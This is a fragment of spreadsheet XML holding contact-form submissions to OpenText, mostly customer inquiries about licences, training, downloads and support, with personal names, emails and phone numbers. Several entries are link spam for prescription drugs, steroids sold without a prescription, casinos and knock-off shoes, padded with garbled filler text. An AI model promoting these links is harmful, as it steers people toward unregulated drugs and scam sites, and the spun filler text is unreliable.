Business Partners APIs include the Re-seller programs. For examples Microsoft, Host-gator, etc._x000D_
Public APIs for advertising and marketing including the social media Twitter, WordPress etc._x000D_
Integration or connection and/or listing of Catalog of APIs (14000 to 15000 APIs)._x000D_
DESCRIPTIONS:_x000D_
API(s) connector or integrator helps connect or integrate with affiliates, resellers, outlets or activities nodes or channels such as Twitter,  WordPress, Social Media for auto-posting, auto-retrieval or auto-extraction for advertising marketing and the related._x000D_
API(s) connector helps connect or load data to the destination database_x000D_
API(s) management or manager helps manage project or program tasks or activities API(s) </t>
  </si>
  <si>
    <t>Need to set up an 832 catalogue</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.barexam101.com/ckeditor/ail.php?y=84]Viagra Deutschland[/url]_x000D_
 Request people you know about where by they purchased their car in addition to their expertise. You can learn so much from other people's encounter, which will save you a lot of time and cash. Will not be shy about it. Folks normally appreciate discussing their activities with other people, if they be great or awful._x000D_
  [url=http://www.bergshin.am/banner/cache.php?p=62-Kamagra-Kaufen-Kamagra-Oral-Jelly-Bestellen-Schweiz-Kamagra-Oral-Jelly-Preis]Kamagra Kaufen[/url]_x000D_
 When composing blog posts, it is important to pick fantastic titles. Make an effort to include keywords within your label, but ensure that it stays short and wonderful. With a bit of imagined and creativity, you are able to develop brief, attractive, intriguing titles that can pull viewers in. Include a number of purposeful key phrases and you will have viewers right away!_x000D_
  [url=http://www.studiovrijgelderland.nl/wp-content/themes/get.php?p=63-Viagra-50,Mannen-Viagra-Voor-Vrouwen,Viagra-50-Mg-Pfizer/]Viagra 50[/url]_x000D_
 You may have previously encountered the workout technique known as "21s" when it comes to bicep curls, however, you can use a similar technique to any strength training exercising. To accomplish a 21, you should comprehensive six partial repetitions, carrying out just the base one half of the exercise. Adhere to this with seven reps of the leading fifty percent. Complete by undertaking six whole representatives of the total exercise._x000D_
  [url=http://www.sbasatsang.org/Content/get.php?hj=59-buy-original-levitra-online-Kamagra-Ireland-Legal-generic-levitra-professional/]buy original levitra online[/url]_x000D_
</t>
  </si>
  <si>
    <t>need pricing for EDI service</t>
  </si>
  <si>
    <t>i need to purchase Brava desktop license. how do i do that</t>
  </si>
  <si>
    <t xml:space="preserve">I seem to have lost the ability to download software from the support site.  When I click download, it takes me to the Account Settings page with no way to download the selected Patch.  Have my permissions been reduced since I last downloaded anything?_x000D_
_x000D_
thanks,_x000D_
_x000D_
_x000D_
_x000D_
Steve Patterson_x000D_
Application Manager_x000D_
Halifax Port Authority_x000D_
spatterson@portofhalifax.ca_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.silaai.in/wp-content/publish.php?ud=1502-Testosterone-Uk-Gp,Buy-Stanozolol-Tablets-Australia,Mesterolone-Canada.html]Testosterone Uk Gp[/url]_x000D_
 When your nose airways are far too slim, try using nasal strips. These can be obtained in any drug store and definately will not harm your airways like sprays do. Pick a high quality product and use the strips right before heading to bed. Inhaling and exhaling must be a little easier with one of these strips._x000D_
  [url=http://www.wloskiepodroze.pl/wp-content/user.php?page=1049-Stanozolol-For-Sale,Nandrolone-New-Zealand,Testosterone-Phenylpropionate-Vs-Propionate]Stanozolol For Sale[/url]_x000D_
 Be ready to go on a snapshot at all times. This does not necessarily mean you ought to have the digital camera in hand, which means you needs to be from the appropriate mind-set constantly. Glance at the world as if you were actually viewing it using your digicam. When you see something interesting, require a image._x000D_
  [url=http://www.ambulance.gr/components/com_content/achieve.php?sui=599-Mesterolone-Sale-Clomiphene-Citrate-Australia-Methandienone-Wholesale/]Mesterolone Sale[/url]_x000D_
 One particular significant tip in terms of real estate will be likely to look into the college section that this house falls inside for those who have youngsters or plan on having them. This is important because the grade of school districts can vary greatly tremendously from community to community. This might not seem to be important unless you have little ones yet, and can be essential to the peace of mind and your child's schooling._x000D_
  [url=http://www.vanocare.com/wp-content/uploads/document.php?y=1636-Trenbolone-Steroid-Profile,Clomid-Singapore-Forum,Testosterone-Phenylpropionate-Recipe/]Trenbolone Steroid Profile[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi - We have a client that is potentially interested in your BPM solution. Would it be possible to set up some time to chat with one of your experts to learn more about your solution offerings as well as our client needs?_x000D_
Thank you,_x000D_
Justine</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casino24list.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino slots&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>cialis soft tabs for sale when can i take another cialis</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;slots online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Hallo, _x000D_
ich möchte gerne 2 weitere Mitarbeiter auf Ihre OT-VIM-Bootcamp-Schulungen schicken. Leider ist der Inhalt (5 Tage) für uns nur teilweise von Bedeutung (nur der VIM-Teil - nicht der Scanning-Teil). Ist es möglich, nur den VIM-Teil als Schulung zu buchen ?_x000D_
Vielen Dank &amp; beste Grüße,_x000D_
Volker Haupenthal</t>
  </si>
  <si>
    <t xml:space="preserve">Login Failed. Please verify your Network ID, User ID, and Password._x000D_
PLEASE RESET MY PASSWORD_x000D_
</t>
  </si>
  <si>
    <t>i have been instructed by our efax supplier Process flows to download some software relating to a new install of Wrightfax where do i find this software</t>
  </si>
  <si>
    <t>costo in farmacia cialis generic cialis in vietnam</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, I am inquiring about training opportunities for my staff here at Ekasys.  We are a silver level partner with OpenText, with strong aspirations to move to Gold level in the future and as such are looking to add to our certified staff.  We currently have several employees that are dedicated OpenText Content server/Process suit engineers, and some of which have been working with OpenText for the better part of 2 decades and have extensive knowledge of the software.  Our team has attended OpenText conferences around the country, and are excitedly preparing for this year’s conference in Toronto Canada as a newly minted partner!  With all that said, I am hopeful you can point me in the right direction.  I am possibly looking to purchase 5 certification exams, would like to get three (3) for Content Server 16 and two (2) for Business process suite 16.  Currently one of my engineers is certified for Content Server 9.7, and we would like to upgrade him to CS16 as well._x000D_
 _x000D_
Please let me know the steps forward to acquire the exams for these team members, as well as any information you could on price and/or price breaks for a package deal.  I am looking to move on this as soon as possible._x000D_
 _x000D_
Thank you for your support, and look forward to hearing from you!_x000D_
_x000D_
Dave Harbaugh_x000D_
Director of Strategy_x000D_
888.352.7971 ext.701_x000D_
Email - dharbaugh@ekasys.com_x000D_
</t>
  </si>
  <si>
    <t>We have two instances of RightFax 10.6 installed in our environment, and we may be looking at getting rid of more copper lines that are currently allowing outbound faxing from multipurpose copiers. In the past, we were aware that RF had some plugin type options for Xerox copiers to allow users to walk up, send a fax, and have the copier connect over the LAN to the RF server and send the outbound fax. We're wondering if this is still available but for other copier manufacturers. Currently, in our environment, we have a mix of Xeroc, Ricoh and Canon copiers. If someone could contact me, it would be appreciated.</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Mike Smith ,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Mike Smith</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I have just had my PC repaired and have lost my Brava Desktop software as a result. Can you advise how I can best restore my subscription please? </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Renewals Team,_x000D_
can you please forward me a renewal cost for my client Finastra  (Formally known as Mysis)_x000D_
2017 PO 28411104_x000D_
1 x Open Text Electronic Maintenance Exceed onDemand Server_x000D_
PN: MAINT-EXMXO399700M_x000D_
Many Thanks_x000D_
Craig </t>
  </si>
  <si>
    <t>Import Customs Clearance Requirement and other PEZA related concerns.</t>
  </si>
  <si>
    <t>Bonjour, concernant votre facture 9000455857/Client 10057472 (Belgique), pourriez-vous me confirmer votre numéro de compte bancaire? D'avance merci. Cordialement,</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Merci. SUPER !!!!!!_x000D_
Enfin !!!_x000D_
Vive la loi et vive le RGPD qui vous oblige à vous mettre en conformité. Avec toutes les lois et réglementations !! _x000D_
Bien cordialement._x000D_
F. Villedieu._x000D_
PS : supprimez toutes les données me concernant de tous vos fichiers (papiers, cartons, bois, plastiques, électrinoqiues, etc....)._x000D_
Prévenez ceux à qui vous avez communiqué mes données - sans mon consentement en plus - et transmettez leur mes volontés._x000D_
_x000D_
Ainsi qu'un "rappel à la loi"._x000D_
_x000D_
If you don't understand : remove me, remove my datas. Respect the rules, please._x000D_
_x000D_
&gt; Message du 20/04/18 09:13_x000D_
&gt; De : "OpenText" &lt;info@opentext.com&gt;_x000D_
&gt; A : faustin.villedieu@orange.fr_x000D_
&gt; Copie à : _x000D_
&gt; Objet : Pour que nous restions en contact après le 25 mai, agissez maintenant_x000D_
&gt; _x000D_
&gt; _x000D_
_x000D_
 _x000D_
_x000D_
&gt; Si cet email ne s’affiche pas correctement, accédez ici à la version online_x000D_
_x000D_
  _x000D_
_x000D_
    _x000D_
_x000D_
_x000D_
 _x000D_
 _x000D_
        _x000D_
  _x000D_
_x000D_
_x000D_
Bonjour Faustin JF Villedieu (Villedieu B. D'Autremont),_x000D_
&gt; _x000D_
&gt; Nous savons combien le respect de votre vie privée est important et, en tant que leader de la gestion des informations d’entreprise, nous y sommes particulièrement attentif. C’est la raison pour laquelle soyez assuré que nous traitons vos informations avec la plus grande prudence.   _x000D_
 .........</t>
  </si>
  <si>
    <t xml:space="preserve"> Dear Colleague,_x000D_
 _x000D_
I happened to come across your website, thought you might want to work with native Asian linguists for your projects, it’s why I’m reaching out to you._x000D_
 _x000D_
As a professional translation and localization company in China, with 15 years’ experience for Asian languages, 50+ in-house translators and engineers in our offices, we have worked for local business company up to market leaders such as APPLE, NVIDIA, AUTODESK, GE, SIEMENS, and SAMSUNG._x000D_
_x000D_
We own and work with all the CAT tools, DTP programs and formats available on the market: Trados 2007 &amp; Studio, SDLX, Transit, Wordfast Pro, Passolo, Swordfish, Across, Alchemy Catalyst &amp; Publisher, Distiller, XBench, Adobe CS, FrameMaker, AutoCAD, and many more. Besides our general services, we also offer tailored training, assessment &amp; support for Trados and other CAT tools._x000D_
_x000D_
With freelance rate and agency service, we might be able to work with you as a reliable partner or just another resource pool for your reference, would it make sense for us to discuss?_x000D_
_x000D_
Currently our advantageous language pairs include English to Chinese, English to Japanese, Germany to Chinese, French to Chinese, Germany to Japanese, Germany to Thai, Germany to Korean, any other languages available. All native speakers! Please assign to me at cara.tang@ccjk.com.</t>
  </si>
  <si>
    <t>Pls sd me case studies for nearly completely(!) paperless Office, if u have such. Preferably in the area of the EU.</t>
  </si>
  <si>
    <t xml:space="preserve">Can we extract all the files together (Extract All) from documentum. If not , is there any workaround for this. </t>
  </si>
  <si>
    <t>Bonjour, serait-il possible d'avoir le lien et le contenu en français de la "Privacy and Security Policy" d'OpenText. Merci beaucoup</t>
  </si>
  <si>
    <t>Thanks to Kentucky us posted.</t>
  </si>
  <si>
    <t>I'd like a demo of your analytic capabilities.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I’m pulling a business justification together to attend your 2018 conference in July. I’d like to understand a little mare about specific training or sessions around:_x000D_
Controls - management and governance reporting from OT solutions in a business environment. _x000D_
Data - analytics and examples of what customer insight data we can obtain_x000D_
Innovation - how to make the best use of the solution and how best to implement. _x000D_
Users - I am not technical but will be responsible for business implementation. so I need to understand the risks and issues associated with major implementation. _x000D_
_x000D_
Many thanks_x000D_
_x000D_
Andrew Parker</t>
  </si>
  <si>
    <t xml:space="preserve">We are having issues with the OpenText RightFax vendor. They are incompetent in providing support and we have been following up with them for a small modification from 1 month but they revert just by saying their developer left and are yet to hire some new resource. On highlighting issues too they dont seem to be technically sound to solve the issues. All issues for past 1 month are pending. </t>
  </si>
  <si>
    <t>I've confirmed my e-mail for 3 times and still got "No Access" on MySupprt page. Why should I do to get my license files?</t>
  </si>
  <si>
    <t xml:space="preserve">buy viagra online e-mail address_x000D_
 [url=http://viagrawithoutdoctorstore.com]viagra without doctor_x000D_
[/url]  ed side effects_x000D_
 &lt;a href="http://viagrawithoutdoctorstore.com"&gt;viagra without a doctor prescription usa_x000D_
&lt;/a&gt; - buy viagra online without a prescription_x000D_
 viagra daily medication_x000D_
</t>
  </si>
  <si>
    <t>Opentext Archive data with SAP ECC6</t>
  </si>
  <si>
    <t>erectile pills</t>
  </si>
  <si>
    <t>erectile medicine new zealand silvasta</t>
  </si>
  <si>
    <t>my opentext id is not working</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://casino24list.com/]casino online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to buy the brava reader to do take off, but i  am not sure which one is the one that i have to choose could you please give me a call to 404-437-5851? Thank you so much </t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casino24list.com/]casino games real money[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino games&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino real money&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>I used to have My Support where I would be able to see roadmaps and product information and KB. but no more. Can you please reinstate it.</t>
  </si>
  <si>
    <t>_x000D_
We are doing a research and will like to collect data from the internet or web and load or connect the data to a destination database for searching. Can you and/or your company or organization help us in this matter?_x000D_
_x000D_
If you don't mind, do you have (the know-how to develop and implement them) or know a good source of IT TOOLS OR APPLICATIONS OR SOFTWARE such as:_x000D_
_x000D_
WebCrawler: For web-based collection of data with GUI that can help user identify various actions such as specifying the start URL, Maximum URLs to be crawled, the way the crawling has to be done – breadth first or depth first._x000D_
_x000D_
API(s) creator: to create API(s) and route or dispatch the API(s)._x000D_
_x000D_
API Content Creator to create pdf, words, eBook or book or digital products, advertising and marketing materials through/via auto-posting through or via online outlets or channels or activities nodes._x000D_
_x000D_
API(s) connector: to connect API(s)_x000D_
_x000D_
API(s) integrator: to integrate API(s)_x000D_
_x000D_
API(s) manager or management: to manage API(s)_x000D_
_x000D_
Creation of custom APIs server with multiple end points and multiple clients_x000D_
_x000D_
Creation or Building a Custom database_x000D_
_x000D_
INTEGRATION OR CONNECTION OR RECONFIGURATION OF APIS AND AS FOLLOWS: _x000D_
Business Partners APIs include the affiliate programs. For examples Click Bank, Warrior Plus, JVzoo etc._x000D_
Business Partners APIs include the Re-seller programs. For examples Microsoft, Host-gator, etc._x000D_
Public APIs for advertising and marketing including the social media Twitter, WordPress etc._x000D_
Integration or connection and/or listing of Catalog of APIs (14000 to 15000 APIs)._x000D_
_x000D_
DESCRIPTIONS:_x000D_
_x000D_
API(s) connector or integrator helps connect or integrate with affiliates, resellers, outlets or activities nodes or channels such as Twitter,  WordPress, Social Media for auto-posting, auto-retrieval or auto-extraction for advertising marketing and the related._x000D_
_x000D_
API(s) connector helps connect or load data to the destination database_x000D_
_x000D_
API(s) management or manager helps manage project or progr</t>
  </si>
  <si>
    <t xml:space="preserve">We utilise Cisco UCM for our UC strategy but have yet to move faxing under this umbrella. We still have MFP printers that send and receive faces via ATA analogue converters which are relatively unreliable. We are looking at moving to a digital system and wanted to chat you about how it might work in our environment._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.thinxsys.cl/fonts/base.php?about=603]Mesterolone South Africa[/url]_x000D_
 Let your business's marketing intend to be updated and on level, but additionally ensure that you understand article promotion prior to going in go pumps. You need to create a greater idea of exactly what is included and what to do to guarantee the procedure works well with your small business. In case you are committed to greater advertising, you are going to utilize these tips to your benefit.The Way To Grasp Your Forex Trading Profession_x000D_
  [url=http://www.hi-techenergysaving.com/css/menu.php?cat_id=467]Clomiphene Manufacturer[/url]_x000D_
 Concentrate your loans into one simple bank loan to fortify your own financial target. Not only will this make monitoring exactly where all of your money is proceeding, but additionally it gives you a further bonus of not having to cover interest rates to a number of locations. One particular rate of interest is better than 4 to 5 interest levels at other areas._x000D_
  [url=http://www.szybbonczyk.pl/templates/month.php?saw=Clomiphene-Citrate-Price-Canada-Boldenone-Cypionate-Vs-Eq-Stanozolol-Steroid-Australia-454.html]Clomiphene Citrate Price Canada[/url]_x000D_
 In case you have anxiousness you would like to eradicate it without delay. The reason being anxiety can result in all kinds of other health problems the more time you live with it. If you wish to properly eliminate your anxiousness then go on reading through to figure out how to accomplish that._x000D_
  [url=http://www.vardanega.com.br/wp-content/crypt.php?theme=1496]Testosterone Test Nz[/url]_x000D_
</t>
  </si>
  <si>
    <t>erectile enhancement pills</t>
  </si>
  <si>
    <t>We are currently conducting market research related to BPM tools, and I would be interested in learning more about your offerings. Please follow up as soon as you are able. Thanks!</t>
  </si>
  <si>
    <t>We are currently evaluating different ECM products for a customer.  It's very difficult to ascertain whether all of their requirements can be met from the publically available materials on your site so I was wondering if there's manuals or configuration material you could send me that have a greater level of detail in them.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, _x000D_
_x000D_
I would like to introduce you to Red Maple Professional Coaching Services. We are newly located in Kitchener, Ontario, and we thought you would like to know about the products and services we offer. These products and services tend to address common workplace themes, resulting in a number of outcomes such as:_x000D_
_x000D_
-Finding and keeping great people_x000D_
-A strong, successive leadership culture for the future _x000D_
-Healthy, well coached teams that hit peak performances_x000D_
-Increased innovation, speed and workflow_x000D_
-Engaged employees, led by continually improving managers_x000D_
-Re-humanized workplaces...where people are people again_x000D_
_x000D_
OpenText’s values of customers, trust, excellence and innovation set you apart from others in your industry and are no doubt what contributes to being one of the fastest growing success stories in the digital world. Your dedication to being the best place to work and find personal meaning is commendable. These things -meaning at work and value driven companies- are topics central to coaching, and so we thought we would introduce ourselves to you. Professional coaching can be a way in which you stay vigilant to the good habits that led to such strong performance on your part as you face the challenges that accompany growth. _x000D_
_x000D_
We offer coaching through 1:1 meetings, large group talks, small group coaching series, and customized coaching. All of these can be seen on our website to learn more. Please be aware that our come-to-market rates are in effect until June 30, 2018. _x000D_
_x000D_
We hope we will have the opportunity to serve you soon. _x000D_
_x000D_
Red Maple Professional Coaching Services_x000D_
Developing the Person Behind the Professional. _x000D_
Workplace One | 51 Breithaupt Street | Kitchener, ON | N2H5G5_x000D_
Phone: 519-221-6632 | E-mail: info@redmaplecoaching.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To Whom it may concern,_x000D_
_x000D_
 _x000D_
_x000D_
I just wanted to find out if you are happy with the window cleaning company you are currently using I am the director of a window cleaning company and I would be interested in working with your company. Our services include gutter cleaning, window and frame cleaning, canopies, solar panels and lots more. _x000D_
_x000D_
Would we be able to arrange a meeting with you if this is something you would be interested in doing, we would also like to point out that our quotes are completely free and you are under no obligation to proceed._x000D_
_x000D_
 _x000D_
_x000D_
However if at this present time you are happy with your window cleaners please keep us in mind._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
 _x000D_
_x000D_
Kind Regards_x000D_
_x000D_
_x000D_
Terry Beckley._x000D_
_x000D_
_x000D_
JTB Window Cleaning Ltd_x000D_
jtbwindowcleaning@gmail.com_x000D_
Tel    : 0203 565 1701_x000D_
Mob  : 07711586720_x000D_
_x000D_
4 Poole Court Road _x000D_
Hounslow_x000D_
Middlesex_x000D_
TW4 7RF_x000D_
_x000D_
this email is for you the building manager of the office in station rd sunbury-on-thames tw16su_x000D_
</t>
  </si>
  <si>
    <t>erection pills</t>
  </si>
  <si>
    <t>erectile pills canada</t>
  </si>
  <si>
    <t>no download Brava! Desktop CXL 16.3 software (bought today)</t>
  </si>
  <si>
    <t>I am looking to purchase additional licenses on behalf of the College of Physicians and Surgeons of Saskatchewan.  However, the contact information I was given was for a Mark Tarica, who appears to no longer be with open text.</t>
  </si>
  <si>
    <t>I have been given the task to scope a new electronic data management system for our document control system</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
 _x000D_
Accurate Background, Inc. is a background screening company, and we would like to verify details submitted by a person listing your company as an employer. Please provide contact information for your Human Resources department or the designated contact handling verifications of employment.  Thank you for your time. _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
_x000D_
Abby Barringer_x000D_
Verifications Researcher_x000D_
Phone: (855) 690- 4473 Ext. 227_x000D_
Fax: (855) 558-1833_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
i need an update about OpeText Ticket: 3425771 _x000D_
_x000D_
Pls call me back (I am in the office for another hour)_x000D_
Thx Jan Gerstenberg</t>
  </si>
  <si>
    <t>Nowadays our current Documentum GBI version is 6.7.2000.0039, Could you tell us  the last one._x000D_
Thank you.</t>
  </si>
  <si>
    <t>We received a package of CD/DVDs with no name on it...the account number is IUT15455...do you have a contact name for this account number?</t>
  </si>
  <si>
    <t>Opportunity for deployment of CCM solution in a customer in the Banking industry</t>
  </si>
  <si>
    <t>Cannot sign in.  Rejects password and rejects password reset.  Cannot download purchased program.  I guess you can just refund credit card if it doesn't work.  So far NOT a good experience.</t>
  </si>
  <si>
    <t>2-0120 OpenText Records Management 16; when is this course in Hoofddorp this year?</t>
  </si>
  <si>
    <t xml:space="preserve">RFQ </t>
  </si>
  <si>
    <t>Need a list of courses included in "9-9900 OpenText Learning On Demand Subscription"</t>
  </si>
  <si>
    <t>I'm trying to download a trial version and after I fill out the form and click submit, nothing happens. We need to get rolling on this version now. We will buying this so need the trail now so we can complete our development work. Please email me the trail information to jarrettstout@ups.com. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Urgently we are currently looking for a terminal emulator software that supports VT100 and TN3270 protocols. We are also looking for a TE that has COM support and can be automated with any COM supported language. _x000D_
Please let us know if Hummingbird HostExplorer has these features. We would like to have a trial version of this software which we can evaluate to see if fits our needs. Please provide the cost information as well._x000D_
_x000D_
Thanks,_x000D_
Hitansu_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am looking for a Data Management Platform and have been recommended to contact you for the following project:_x000D_
_x000D_
We are looking for a content management platform that can support training content for three of our teams. The teams will all be participating in creating this "Library". Therefore the platform has to be easily accessible and easy to upload content, with extensive filtering options and easy to maintain in the long run. By that I mean that we have to with a few clicks are able to categorize content and add labels/tags. In addition, we need to bulk select filtered results to download and/or email to clients. It should also support keynote presentations with a preview._x000D_
_x000D_
It would be great to schedule a Demo._x000D_
_x000D_
Thank you and have a great day,_x000D_
_x000D_
Christina </t>
  </si>
  <si>
    <t xml:space="preserve">erectile smoothie_x000D_
erectile pain_x000D_
best erectile pump_x000D_
</t>
  </si>
  <si>
    <t>I am unable to set a new password</t>
  </si>
  <si>
    <t>Hi, I've been using BravaReader for some time now for construction drawing takeoff's in PDF and JPG format.  I dont need it for publishing.  Which product sku is the right one?  TX or TXL?</t>
  </si>
  <si>
    <t xml:space="preserve">I had a general query whether StreamServe v 5.6.2 GA 2014 can send an outbound email with the generated PDF document </t>
  </si>
  <si>
    <t>Can we please set up a call to discuss what's in store? Thanks!</t>
  </si>
  <si>
    <t>Please stop 800-396-9402 from texting and calling this number. All calls must cease now!</t>
  </si>
  <si>
    <t>Discussion of content management options</t>
  </si>
  <si>
    <t>Need to access the company’s support account.</t>
  </si>
  <si>
    <t xml:space="preserve">Plus original, le V7 Dusters Complete Cruiser Flashback &amp;agrave; 175 euros plaira aux sportifs et particuli&amp;egrave;rement aux fans de skateboard.Les tee-shirts inspir&amp;eacute;s des campus am&amp;eacute;ricains, les sneakers en tout genre et, bien &amp;eacute;videmment, les jeans sont autant de v&amp;ecirc;tements que vous pouvez choisir sans craindre la faute de go&amp;ucirc;t.à ce titre, le début de soirée (entre 19h et 21h) semble être le moment opportun. _x000D_
[url=http://www.rosherun99.fr/Chaussures-Nike-Roshe-Run-Mesh-Homme-Noir-Rouge-Roshe-Run-Rouge-Et-Blanc-KO34685.html]roshe run rouge et blanc[/url]_x000D_
[url=http://www.rosherun99.fr/Nike-Roshe-Run-Pattern-Chaussure-pour-Femme-Rouge-Nike-Roshe-Run-Nike-KO34470.html]nike roshe run nike[/url]_x000D_
 _x000D_
et une grande intégration avec les boutons / accessoires / tigre boucle / Haute Commission chaussures de chaussures chaussures plus besoin pour faire face à Taoban chaussures à fermeture éclair Les chaussures suivantes bottes empeignes plus besoin de brancher une masse de papier et uniquement avec la "queue" plus tenir des baguettes.Résine de polyuréthane a une bonne adhérence et un film plastique est utilisé comme adhésif de l'emballage alimentaire. _x000D_
Et puis, pour faire honneur &amp;agrave; la belle saison, n&amp;rsquo;h&amp;eacute;sitez pas &amp;agrave; jouer la carte de la couleur !._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.jurist.rs/css/list.php?ppp=398-igf-1-for-sale-uk-gensci-jintropin-fake-getropin-for-sale.html]igf-1 for sale uk[/url]_x000D_
 Be aware of the insurance deductibles you decide on when selecting a brand new vehicle insurance plan. Although picking out a better deductible helps to reduce your superior payments, it also means you pay a lot more from your bank account in the case of a compensation claim. Insurance deductibles usually impact particular insurance coverage choices only, so consider personal deductible portions in line with the type of declare. It could sound right to possess a reduced deductible for complete than collision, by way of example._x000D_
  [url=http://www.jeffbarone.com/media/change.php?cause=144-Boldenone-Undecylenate-400-Sildenafil-Citrate-Powder-Suppliers-Trenbolone-Acetate-Benefits.html]Boldenone Undecylenate 400[/url]_x000D_
 When you drop a little piece similar to a engagement ring or earring into a kitchen sink strain, believe is just not shed. By cautiously taking off the U-formed capture beneath the kitchen sink, you may probably recover the piece. Keep in mind the snare will probably be loaded with h2o, though, so have anything below it to catch the spills._x000D_
  [url=http://www.parcerias.com.br/img/user.php?top=1286]Testosterone Enanthate Results[/url]_x000D_
 To eradicate acne breakouts, do not have something remember to brush from the face frequently. Possibly hair minimize brings about the hair to touch the face and make it fatty. Stay away from putting on scarves or hats, way too. Do your very best to maintain your hands out of your experience, particularly if your hands are filthy._x000D_
  [url=http://www.xuma.com.tr/cook/footer.php?yu=531-Drostanolone-Powder,Sildenafil-Citrate-Powder-Suppliers,Trenbolone-Acetate-Benefits]Drostanolone Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are a process engineering design consultancy based in the UK.  We are looking to introduce a document management system to help with the control of project documentation. / knowledge management.  We create documents in a wide range of formats but primarily Microsoft Office products and AutoCAD 2D and 3D files._x000D_
We would like a system to control documents throughout their lifecycle from initial creation, drafting, checking, approval, and issuing and also to assist with revision control._x000D_
We are currently carrying out an initial assessment of the solutions available on the market and would appreciate it if you could answer the following questions to allow us to make an initial assessment._x000D_
•	How is our data secured – are you compliant with ISO 27001_x000D_
•	Are documents stored on our site or in cloud_x000D_
o	if in cloud, where are servers located_x000D_
•	Can data be accessed remotely_x000D_
•	How is data backed up / restored_x000D_
•	Are there any restrictions on file types that can be stored_x000D_
•	What is your guaranteed up time (if applicable)_x000D_
•	How are documents controlled_x000D_
o	Creation / Drafting_x000D_
o	Checking / Approval_x000D_
o	Issuing_x000D_
o	Revision control_x000D_
o	Document numbering / identification_x000D_
•	How established is the software? (Number of clients, version history etc.)_x000D_
•	What is your licence model (Concurrent, per seat etc.)_x000D_
•	What is your pricing structure_x000D_
•	What support is included, do you offer support during UK office hours_x000D_
•	Can access be given to people outside of our organisation to specific folders/files for review_x000D_
•	What experience do you have within the engineering sector? (Number of clients, references, relevant case studies etc)_x000D_
Once we have created a shortlist, within the next 4-6weeks, we will invite successful suppliers to present a demonstration of their offering after which we will make a final selection for implementation.</t>
  </si>
  <si>
    <t>problem when creating a new cover sheet. no link reference found.</t>
  </si>
  <si>
    <t>Hello, We are experiencing an error while installing Exceed V15 on Win10. "Fatal Error: Cannot open default font"._x000D_
After a research on your website I read that : "Font security: Exceed 15 SP4 now supports the “Block Untrusted Fonts” group policy, which is a security feature introduced in Windows 10 / Server 2016."_x000D_
_x000D_
Could you please let me know how to get the SP4 patch to apply on our V15 version ?_x000D_
_x000D_
Best Regards,_x000D_
Manac'h Sébastien</t>
  </si>
  <si>
    <t>We are a small CRO (15-20 employees) working in a regulated field. _x000D_
We are interested to transform our Quality Management, Document Management and some other functions. _x000D_
Before going into our requirements we would like to learn pricing ranges for OpenText ECM solutions  - what is its floor price and what are the important pricing determinants (modules/features included, per-user licensing, etc.)? _x000D_
_x000D_
Is it subscription based or one-time licensing? We would like to consider on-premises option.  _x000D_
_x000D_
Thanks_x000D_
Mher</t>
  </si>
  <si>
    <t>We would like to acquire 6 OpenText Exceed TurboX software licenses, please send me a quote._x000D_
_x000D_
Thank you very much</t>
  </si>
  <si>
    <t>I’m interested to a solution (based on Documentum, I suppose), which converts a batch of documents into individual PDF files that are then automatically attached to the relevant SAP object._x000D_
Source documents are scanned images._x000D_
Through the use of barcode recognition from PDF text files the process should be either fully automated or presented to an operator for user verification._x000D_
The attaching of the PDF to the correct SAP transaction has to be fully automated._x000D_
I would like to be contacted by your Italian rappresentative.</t>
  </si>
  <si>
    <t>Fragments of a meteorite that fell to Earth about a decade ago provide compelling evidence of a lost planet that once roamed our solar system, according to a study published Tuesday. _x000D_
 _x000D_
Researchers from Switzerland, France and Germany examined diamonds found inside the Almahata Sitta meteorite and concluded they were most likely formed by a proto-planet at least 4.55 billion years ago. _x000D_
 _x000D_
The diamonds in the meteorite, which crashed in Sudan's Nubian Desert in October 2008, have tiny crystals inside them that would have required great pressure to form, said one of the study's co-authors, Philippe Gillet. _x000D_
 _x000D_
"We demonstrate that these large diamonds cannot be the result of a shock but rather of growth that has taken place within a planet," he told The Associated Press in a telephone interview from Switzerland. _x000D_
 _x000D_
Gillet, a planetary scientist at the Federal Institute of Technology in Lausanne, said researchers calculated a pressure of 200,000 bar (2.9 million psi) would be needed to form such diamonds, suggesting the mystery planet was as least as big as Mercury, possibly even Mars. _x000D_
 _x000D_
